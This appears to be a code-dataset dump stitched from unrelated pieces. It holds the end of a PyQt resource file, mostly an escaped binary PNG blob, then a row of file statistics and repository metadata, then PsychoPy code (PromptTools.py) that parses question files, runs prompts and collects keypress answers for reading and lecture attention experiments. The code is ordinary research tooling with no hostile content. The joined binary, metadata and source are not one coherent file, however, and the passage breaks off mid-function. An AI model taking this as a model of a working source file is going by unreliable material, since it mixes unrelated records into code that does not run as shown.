\xdcT{\xda\x9c\x8c\x13,l\x14T$\x8b\x9d\x82\x89W\x86\xae>\xe4p\x11\x04\xa1\x935%\x1b0\x05\xb5F\xe5\x13\x03y\xfb\x0a\xab\x91\x02.\x98\x90\x0c\x89f`V\xe9M7\x0c9\x0bj\xc2\xa6\x16l\xfe\xa2\xcd\xfb\x9f\xda\xb3\xa96\x13\x01HF\xb1v\xa8yA\xed\xe9\xa9\x0b\xa7\x9e\x1a\x09\xcc.\x92\x804\xa8\xa7\x0bA\xd3\x5c0\x92\xd9\xb2bo\xda?\x96\xbb\xaf\xe4\x0c\xc0\x9fn\xd96,\x17,\xe5|e1\xb5\x92d\x13\x82\xea\xe6\xa9\x99\x91b[A\x93\xb3\x93\xf47\xd5f\x1a\x8b\xc1Y\xa1D\xa4@\xf5\xf9\x82b9\xaaYM\x08F\x1b\x95m\xc5<\xfd\x85\xbc#\xc0\x05c~\xf6\xa3\xa4gC\x8c\xb3\x09\xc9&?\xb8\x7f\xe6\x8e\xe5\xc4%;\xa5\xadX\xab7\x93\x9e\xb3F\x9ch\x14\x16m\x22\xe9\xd9\xb0O\xa2)\x19\x85\xc5 \xf7(\xc8\x0d\x80\xc6\xcd\xdbK\x12E\x09R+TYX\x18\x95 \xed\xed\xdb\xd3I\xa7S\xfd-\xd6\xeaMg\x85=\x92\x95I\x92\x92d\xe3\x1281\x94\x97\xbfK\x94_\x04\xc8\xca>_\x9b\xc5\x07\x0fD8\xdb\x8dl\xb2X\xabw\x5c\xc7\x97\x8b\x80%*>x \x92,&\xd1n\x07S\x92\x81l\xa0q\xf3\xf6\x5c\x97\xc5\xdc\x00p\x8e+\x9c3RgQ#\x0c\x07$+:\xd9\xfe\x95u:\x03\x00\x90\xca\xf6KV*>\xf4D\xec\x9c5\x9d3p\x85w'\x00\xe6\x82b6K\xc1\xe1dCR\x92\x8c\xe2\xc3\x07\xa2\x95tV\x8a\x00\x00\x07\x91d\xd9\x0d;\x8b%\xc39+\xe6\xe42p\x06\x1b\xa1\x17v\xed\xe8\xfaY\xfe\xe2G~\xbd2\x82\xa7A\xb9\xed\x04\x9f\xdfY\xae\x03e\xb0*\x10\x81\xea=\x89m,\xd6;\xd7\x80\xe7w\x96\xb5e:\xeax\x13/\xdc\x18\x0e\xc9T\xdb2\x1dY\xab\xfd-\xd3\xf5;rq\x9a\x1cS@(\xf6K\xe0\x8e-\xd3\xf5H2\x16\x0am\x07\x9cv\x9d\xb7K\x01\xb1C\xb2\xc8\xcb\x96%\xc3\x89\x5c\xb7\xc4\xf9\xad\x02Ip\xd8o\x80\xca\x00r\xc4(\xb8u%\x95\xf6\x8d\xd0)\xfd\xb2!R\xe2\xa3aX\xf6\xb6q\xe9\xbb\x14\x80\x14\xa2\xece+\x1c\x0d\xc3a'\xc6\xe54|4\x0c\x8b\x9dtV\xca\xbe\xa3a8,QLa< \xd8\xedm7\xb6\xd6\xeb\x8d\xbc|\x86\x1c\x01\xd8Z\xaf7$\x22\xbf\x12\x8cm\xad\xd7'Q\x10\x9b\x0a\xb58\x0c\x97=\xc8tJ\x81\xd90,\x99\x82\xbd8\xdb\x07\xe0\xc4\xb0d\x08\xbb'/\x7f\x97(\xdf\xad\xb0\x15\xaaK\x87\x97\xe7\xae\xbfa4\xb5`\xc4\x89b\xbf\x0a\x13\xcb\x81\xb0\x1c\x00\xb3\xdbw\x95\xcc\x15&\x9c\xac1\x17\xb8\xaaT\xd8\xbb\xb4\xc1:\x81\xdb\x97\xab\xbf\xe4\x0c\xc0\xd6\xfat$\xd9T6[\xc1^\x97h@I\x10\xcaY\xb9\xcf\xf5\xd4\x8f\x5c\xb7\xb3\xdc*\xdf\x0e\xc0\xec\xf5\xbb\x86)\xa8.\x8c\xf9 \x0d\xfb\x5c\xcf\xa8\x9c\x0d\xf9]`\xb5\xb4\xc2\x8a\xf2N)\xf7\x07\x22q\x18\x0e\xf4&=\xc7\xc0\x06\x80\xa63\x1b\xe9-\x04q\x9a$\x13`e \x16\xb6\x1f\x5cdX\xdd\x99U\x02\xd8\x81\xd3\x10F\x11\xd3\xbe\xc5BR\xedI\xfaF\x0d\xf9\xc3\x8f\xa2K\x0fL\x87\xb9:\xeaiU\x9e\x08\xcdn\xdfUrF\x9d\xec{\x00\x90\xaaI_\xb2\xaf'\xe9)\x99l\xb7\xb2g\x84\xad[\xdaHX\x9c\xa6\xc18@O\x90\xec\xc5l\xe9\xe0\x13'\xbd\x8b\xe1j\xcc>\xac\xe2C\xd1\xd9\xed\xbbJ\x92\xab\xe9_\x8f\xbf\xd4\xc4\x18\x0fpS\x97<Q\x8f\x01\x8e\x5cs\xa3>\xfe\xe4\xa3\x06pd\xdb\xce\xb2\x05n\xb7d\xc3-f\xa2\xa4?\xad\xac\xd6\xcd\xc3*?\x15\x8e\xc3p\xa00\xc7\x18f\xa3'uHM\x8c8K\x09E>5Z\xfai*\xb0\xea\xe5O>\x96{\xd1k\xa75y/\x10o\x0b\x8b\x05i\x0c\x18b)-\x96\xa7\x86\xcc\xeeq'\xd8W:\xb4z\xb3\xdeJk\xfe\x85\xc8\xec\xe0\xf6RJ\xa1$\xb3\xa2Ic2\xab\x1a\x8a\xd3\xa0\x10\x97f\xf2\xdd\xe4\x9c\x0eu\xf5\x13\x99g?}\xad.?\xf8\xf8\x19\x9f\xe8\xce\x84\xba\xfb}\x80\xfb?\x7f;|\xea\xe7\x80kO\xeb_\x89u\xdb\x81n\xd3:\x00\xddv\xa0\xdb\xb4\x0e@\xb7\x1d\xe86\xad\x03\xd0m\x07\xbaM\xeb\x00t\xdb\x81n\xd3:\x00\xddv\xa0\xdb\xb4\x0e@\xb7\x1d\xe86\xad\x03\xd0m\x07\xbaM\xff\xf7\x00\xfc\x13,i\x1bp;,\xeb\xd4\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x1e\x01\xf2\x8f@\x00p\x00o\x00i\x00n\x00t\x00w\x00i\x00s\x00e\x00r\x00i\x00g\x00i\x00d\x00r\x00e\x00g\x00i\x00s\x00t\x00r\x00a\x00t\x00i\x00o\x00n\x00s\x00t\x00e\x00p\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x19\x00`\xc8G\x00p\x00o\x00i\x00n\x00t\x00w\x00i\x00s\x00e\x00r\x00i\x00g\x00i\x00d\x00r\x00e\x00g\x00i\x00c\x00o\x00n\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00B\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00T\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 362.636364 | 6,842 | 0.744422 | 1,753 | 7,978 | 3.374786 | 0.339989 | 0.051724 | 0.041075 | 0.020284 | 0.08739 | 0.083333 | 0.081812 | 0.081812 | 0.077248 | 0.072684 | 0 | 0.247743 | 0.014415 | 7,978 | 21 | 6,843 | 379.904762 | 0.504642 | 0.022813 | 0 | 0 | 0 | 0.333333 | 0.953006 | 0.951461 | 0 | 0 | 0.00103 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb07d485f08075a0ce6ad87b5a2b81c5d839ff8f | 44,754 | py | Python | GeneralTools/PromptTools.py | djangraw/PsychoPyParadigms | f63072221f9abb7fb1c64457b65dcb3555e3919b | [
"MIT"
] | 50 | 2016-02-27T23:06:57.000Z | 2021-12-23T01:22:18.000Z | GeneralTools/PromptTools.py | caofeizhen/PsychoPyParadigms | dd0921d94d21cc04be8f74de684e24f09dbc9e4d | [
"MIT"
] | null | null | null | GeneralTools/PromptTools.py | caofeizhen/PsychoPyParadigms | dd0921d94d21cc04be8f74de684e24f09dbc9e4d | [
"MIT"
] | 44 | 2016-10-03T10:47:06.000Z | 2021-12-23T01:22:20.000Z | #!/usr/bin/env python2
"""Load Questions, Run Prompts, and Run Probe Trials."""
# PromptTools.py
# Created 1/30/15 by DJ based on VidLecTask.py
# Updated 3/16/15 by DJ - added ReadingTask_dict.py
# Updated 9/8/15 by DJ - added Likert option and RunQuestions_Move.
# Updated 10/29/15 by DJ - updated distraction/reading task prompts to ask subjects to read top to bottom.
# Updated 11/9/15 by DJ - added ParsePromptFile function.
# Updated 1/11/16 by DJ - added fwdKeys input to RunPrompts function
# Updated 1/14/16 by DJ - added returnTimes input to ParseQuestionsAll (extracts pages and times of questions), added 'First' conditions to GetPrompts
# Updated 1/20/16 by DJ - fixed RunPrompts fwdKeys default
# Updated 1/24/17 by DJ - removed import of visual, fixed question timeout
# Updated 3/17/17 by DJ - added SingingTask
from psychopy import core, event, logging#, visual # visual and gui conflict, so don't import it here
import time
import string
# --- PARSE QUESTION FILE INTO QUESTIONS AND OPTIONS --- #
def ParseQuestionFile(filename,optionsType=None,returnTimes=False): # optionsType 'Likert' returns the Likert scale for every question's options.
# initialize
questions_all = []
answers_all = []
options_all = []
pages_all = []
times_all = []
if optionsType is None:
options_this = []
elif optionsType == 'Likert':
options_likert = ['Strongly agree','Agree','Neutral','Disagree','Strongly disagree']
options_this = options_likert
# parse questions & answers
with open(filename) as f:
for line in f:
# remove the newline character at the end of the line
line = line.replace('\n','')
# replace any newline strings with newline characters
line = line.replace('\\n','\n')
# pass to proper output
if line.startswith("-"): # incorrect answer
options_this.append(line[1:]) # omit leading -
elif line.startswith("+"): # correct answer
options_this.append(line[1:]) # omit leading +
answers_all.append(len(options_this))
elif line.startswith("?"): # question
questions_all.append(line[1:]) # omit leading ?
# if it's not the first question, add the options to the list.
if options_this:
options_all.append(options_this)
if optionsType is None:
options_this = [] #reset
elif optionsType == 'Likert':
options_this = options_likert
elif line.startswith("#"): # question header
pieces = line.split(',')
for piece in pieces:
nameval = piece.split() # split at space
if nameval[0] == 'PAGE':
pages_all.append(nameval[1])
elif nameval[0] == 'TIME':
minsec = nameval[1].split(':')
times_this = int(minsec[0])*60+int(minsec[1])
times_all.append(times_this)
# info[nameval[0]] = nameval[1]
# make sure last set of options is included
options_all.append(options_this)
# return results
if returnTimes:
return (questions_all,options_all,answers_all,pages_all,times_all)
else:
return (questions_all,options_all,answers_all)
# --- PARSE PROMPT FILE INTO TOP AND BOTTOM PROMPTS --- #
# Each top prompt should be preceded by a +. Each bottom prompt should be preceded by a -. Everything else will be ignored.
def ParsePromptFile(filename):
# initialize
topPrompts = []
bottomPrompts = []
# parse questions & answers
with open(filename) as f:
for line in f:
# remove the newline character at the end of the line
line = line.replace('\n','')
# replace any newline strings with newline characters
line = line.replace('\\n','\n')
# pass to proper output
if line.startswith("-"): # bottom prompt
bottomPrompts.append(line[1:]) # omit leading -
elif line.startswith("+"): # top prompt
topPrompts.append(line[1:]) # omit leading +
# if it's not the first question, add the options to the list.
# return results
return (topPrompts,bottomPrompts)
# Display prompts and let the subject page through them one by one.
def RunPrompts(topPrompts,bottomPrompts,win,message1,message2,fwdKeys=None,backKeys=['backspace'],backPrompt=0):
iPrompt = 0
# declare default for fwdKeys
if fwdKeys is None:
fwdKeys = [chr(i) for i in xrange(127)]
while iPrompt < len(topPrompts):
message1.setText(topPrompts[iPrompt])
message2.setText(bottomPrompts[iPrompt])
#display instructions and wait
message1.draw()
message2.draw()
win.logOnFlip(level=logging.EXP, msg='Display Instructions%d'%(iPrompt+1))
win.flip()
#check for a keypress
thisKey = event.waitKeys(fwdKeys + backKeys + ['q' 'escape'])
if thisKey[0] in ['q','escape']:
core.quit()
elif thisKey[0] in fwdKeys:
iPrompt += 1
elif thisKey[0] in backKeys:
iPrompt = backPrompt
# Display questions and let user select each one's answer with a single keypress.
def RunQuestions(question_list,options_list,win,message1,message2, name='Question', questionDur=float('inf'), isEndedByKeypress=True,respKeys=['1','2','3','4']):
# set up
nQuestions = len(question_list)
allKeys = ['']*nQuestions
trialClock = core.Clock()
iQ = 0
while iQ < nQuestions:
print('iQ = %d/%d'%(iQ+1,nQuestions))
# get response lists
respText = "" # to be displayed to subject
# respKeys = [] # allowable responses
for iResp in range(0,len(options_list[iQ])):
respText += '%d) %s\n'%((iResp+1),options_list[iQ][iResp])
# respKeys += str(iResp+1)
# set text
message1.setText(question_list[iQ])
message2.setText(respText)
# draw question & answers
message1.draw()
message2.draw()
#Flush the key buffer and mouse movements
event.clearEvents()
#Put the image on the screen
win.logOnFlip(level=logging.EXP, msg='Display %s%d'%(name,iQ));
win.flip()
#Reset our clock to zero - I think this call should take less time than window.flip, so resetting after the flip should be slightly more accurate.
trialClock.reset()
# Wait for keypress
endQuestion = False;
while (trialClock.getTime()<questionDur and not endQuestion):
newKeys = event.getKeys(keyList=(respKeys + ['q','escape','backspace','period']),timeStamped=trialClock)
for newKey in newKeys:
# check for quit keys
if newKey[0] in ['q', 'escape']:
endQuestion = True; # end the loop
elif newKey[0] == 'backspace':
print('backspace')
iQ = max(0,iQ-1) # go back one
endQuestion = True;
elif newKey[0] == 'period':
iQ +=1 # skip fwd without recording response
endQuestion = True;
else: # ok response keys
iA = respKeys.index(newKey[0]) # convert from key to index in respKeys list
allKeys[iQ] = (iA+1, newKey[1]) # make new tuple with answer index and response time
# allKeys[iQ] = newKey
if isEndedByKeypress:
iQ +=1
endQuestion = True;
if len(newKeys)>0 and newKey[0] in ['q', 'escape']:
break # end the loop
elif (trialClock.getTime()>=questionDur):
iQ += 1 # advance question
# return result
return allKeys
# Display questions and let the subject navigate selection up and down before selecting.
def RunQuestions_Move(question_list,options_list, win, name='Question', questionDur=float('inf'), isEndedByKeypress=True, upKey='up', downKey='down', selectKey='enter'):
# set up
nQuestions = len(question_list)
allKeys = ['']*nQuestions
trialClock = core.Clock()
iQ = 0
iA = 0
respKeys=[upKey,downKey,selectKey]
# make visuals
from psychopy import visual
questionText = visual.TextStim(win, pos=[0,+.5], wrapWidth=1.5, color='#000000', alignHoriz='center', name='questionText', text="aaa",units='norm')
optionsText = []
for iResp in range(0,len(options_list[0])):
optionsText.append(visual.TextStim(win, pos=[0,-.1*iResp], wrapWidth=1.5, color='#000000', alignHoriz='center', name='option%d'%(iResp+1), text="aaa",units='norm',autoLog=False))
while iQ < nQuestions:
print('iQ = %d/%d'%(iQ+1,nQuestions))
# default response is middle response (and round down)
iA = int((len(options_list[iQ])-1)*0.5)
# set and draw text
questionText.setText(question_list[iQ])
questionText.draw()
optionsText[iA].bold = True # make currently selected answer bold
for iResp in range(0,len(options_list[iQ])):
optionsText[iResp].setText('%d) %s'%((iResp+1),options_list[iQ][iResp]))
optionsText[iResp].draw()
# Flush the key buffer and mouse movements
event.clearEvents()
# Put the image on the screen
win.logOnFlip(level=logging.EXP, msg='Display %s%d'%(name,iQ));
win.flip()
# Reset our clock to zero - I think this call should take less time than window.flip, so resetting after the flip should be slightly more accurate.
trialClock.reset()
# Wait for keypress
endQuestion = False;
while (trialClock.getTime()<questionDur and not endQuestion):
newKeys = event.getKeys(keyList=(respKeys + ['q','escape','backspace','period']),timeStamped=trialClock)
for newKey in newKeys:
# check for quit keys
if newKey[0] in ['q', 'escape']:
endQuestion = True; # end the loop
elif newKey[0] == 'backspace':
print('backspace')
iQ = max(0,iQ-1) # go back one
endQuestion = True;
elif newKey[0] == 'period':
iQ +=1 # skip fwd without recording response
endQuestion = True;
elif newKey[0] == upKey: # move response up
# remove old bold
optionsText[iA].bold = False
# update answer
iA -= 1
if iA<0:
iA=0
# make newly selected answer bold
optionsText[iA].bold = True
# redraw everything
questionText.draw()
for iResp in range(0,len(options_list[iQ])):
optionsText[iResp].draw()
win.flip()
elif newKey[0] == downKey: # move response down
# remove old bold
optionsText[iA].bold = False
# update answer
iA += 1
if iA>=len(options_list[iQ]):
iA = len(options_list[iQ])-1
# make newly selected answer bold
optionsText[iA].bold = True
# redraw everything
questionText.draw()
for iResp in range(0,len(options_list[iQ])):
optionsText[iResp].draw()
win.flip()
elif newKey[0] == selectKey:
# log response
allKeys[iQ] = (iA+1, newKey[1]) # make new tuple with answer index and response time
logging.log(level=logging.EXP, msg= 'Responded %d'%(iA+1))
# remove old bold
optionsText[iA].bold = False
# advance question index
iQ +=1
if isEndedByKeypress:
endQuestion = True;
else:
print('pressed %s'%newKey[0])
if len(newKeys)>0 and newKey[0] in ['q', 'escape']:
break # end the loop
# return result
return allKeys
# ===== DECLARE PROMPTS ===== %
def GetPrompts(experiment,promptType,params):
if experiment == 'VidLecTask_dict.py':
if promptType == 'Test':
# declare default list of prompts
topPrompts = ["You are about to watch a video of an academic lecture. Keep your eyes open and try to absorb as much of the material as you can.",
"When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'Reverse':
# prompts for BACKWARDS MOVIE:
topPrompts = ["You are about to watch a video of an academic lecture played backwards. Try to ignore it and think about something else.",
"This is the LOW ATTENTION RUN: it's extremely important that you do NOT focus on the lecture during this run.",
"Stay awake and keep your eyes open, but let your mind wander freely: try not to do any repetitive task like counting or replaying a song.",
"If at any time you notice that your mind hasn't been wandering as instructed, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
"Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'Wander':
# prompts for LOW ATTENTION:
topPrompts = ["You are about to watch a video of an academic lecture. Try to ignore it and think about something else.",
"This is the LOW ATTENTION RUN: it's extremely important that you do NOT focus on the lecture during this run.",
"Stay awake and keep your eyes open, but let your mind wander freely: try not to do any repetitive task like counting or replaying a song.",
"When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
"If at any time you notice that your mind hasn't been wandering as instructed, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'Attend':
# prompts for HIGH ATTENTION
topPrompts = ["You are about to watch a video of an academic lecture. Try to absorb as much of the material as you can.",
"This is the HIGH ATTENTION RUN: it's extremely important that you pay close attention to the lecture during this run.",
"When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
"If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment == 'VidLecTask_vigilance.py':
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["You are about to watch a video of an academic lecture. Keep your eyes open and try to absorb as much of the material as you can.",
"When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
"During the lecture, a %s dot will display in the middle of the screen. Look at the dot for the duration of the lecture. When the dot turns %s, press the %c key with your right index finger."%(params['dotColor'],params['targetColor'],params['respKey'].upper()),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('ReadingTask') or experiment.startswith('ReadingImageTask_eyelink') or experiment.startswith('DistractionTask'):
if promptType == 'Test':
# declare default list of prompts
topPrompts = ["You are about to read the transcript of an academic lecture. Try to absorb as much of the material as you can.",
"Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
"When the reading is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'Read':
topPrompts = ["You are about to read the transcript of an academic lecture. Try to absorb as much of the material as you can.",
"When the session is over, you'll be asked a few questions about the material.",
# "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
"Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'AttendReading':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
"When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
# "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
"Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
"When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
"In this session, pay attention to ONLY the reading and IGNORE the audio."]
elif promptType == 'AttendReadingFirst':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
"When the session is over, you'll be asked a few questions about the reading and audio.",
"Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
"When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
"Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
"For the first part of this session, pay attention to ONLY the reading and IGNORE the audio."]
elif promptType == 'AttendReading_short':
topPrompts = ["In this session, pay attention to ONLY the reading and IGNORE the audio."]
elif promptType == 'AttendReadingFirst_short':
topPrompts = ["For the first part of this session, pay attention to ONLY the reading and IGNORE the audio."]
elif promptType == 'AttendReading_switch':
topPrompts = ["For the rest of the session, pay attention to ONLY the reading and IGNORE the audio."]
elif promptType == 'AttendBoth':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
"When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
# "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
"Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
"When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
"In this session, pay attention to BOTH the reading AND the audio."]
elif promptType == 'AttendBothFirst':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
"When the session is over, you'll be asked a few questions about the reading and audio.",
"Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
"When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
"Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
"For the first part of this session, pay attention to BOTH the reading AND the audio."]
elif promptType == 'AttendBoth_short':
topPrompts = ["In this session, pay attention to BOTH the reading AND the audio."]
elif promptType == 'AttendBothFirst_short':
topPrompts = ["For the first part of this session, pay attention to BOTH the reading AND the audio."]
elif promptType == 'AttendBoth_switch':
topPrompts = ["For the rest of the session, pay attention to BOTH the reading AND the audio."]
elif promptType == 'AttendLeft':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will sometimes hear audio from a different lecture.",
"On some trials, a lecture will play in only your left ear. On other trials, a DIFFERENT lecture will play in only your right ear.",
"Only the reading and the LEFT ear lecture are important. When the audio is in your LEFT ear, try to absorb as much of BOTH the reading AND audio material as you can.",
"When the audio is in your RIGHT ear, IGNORE the audio and just absorb the reading.",
"When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
# "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
"Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'AttendRight':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will sometimes hear audio from a different lecture.",
"On some trials, a lecture will play in only your right ear. On other trials, a DIFFERENT lecture will play in only your left ear.",
"Only the reading and the RIGHT ear lecture are important. When the audio is in your RIGHT ear, try to absorb as much of BOTH the reading AND audio material as you can.",
"When the audio is in your LEFT ear, IGNORE the audio and just absorb the reading.",
"When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
# "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
"Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'AttendForward':
topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will sometimes hear audio from a different lecture.",
"On some trials, a lecture will play forward. On other trials, the lecture will play backward.",
"Only the reading and the forward lecture are important. When the audio playing FORWARD, try to absorb as much of BOTH the reading AND audio material as you can.",
"When the audio is playing BACKWARD, IGNORE the audio and just absorb the reading.",
"When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
# "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
"Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
# "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
# "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
"Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'TestReading':
topPrompts = ["You will now be asked a few questions about the text you just read. Answer using the number keys.",
"There's no time limit on each question, but try to answer in a reasonable amount of time.",
"If you don't know the answer, take your best guess."]
elif promptType == 'TestReading_box':
topPrompts = ["You will now be asked a few questions about the text you just read. Answer using the button box.",
"There's no time limit on each question, but try to answer in a reasonable amount of time.",
"If you don't know the answer, take your best guess."]
elif promptType == 'TestBoth':
topPrompts = ["You will now be asked a few questions about the lectures you just read and heard. Answer using the number keys.",
"Some questions may be on material you were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
"There's no time limit on each question, but try to answer in a reasonable amount of time."]
elif promptType == 'Practice':
topPrompts = ["You are about to read the transcript of an academic lecture. Try to absorb as much of the material as you can.",
# "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
"Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
"This session is just practice. When you're done reading a page, press the '%s' key to advance to the next one."%(params['pageKey'].upper()),
"Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'None':
topPrompts = []
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
if promptType == 'None':
bottomPrompts = []
else:
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('ReadingTask_questions'):
if promptType == 'Test':
# declare default list of prompts
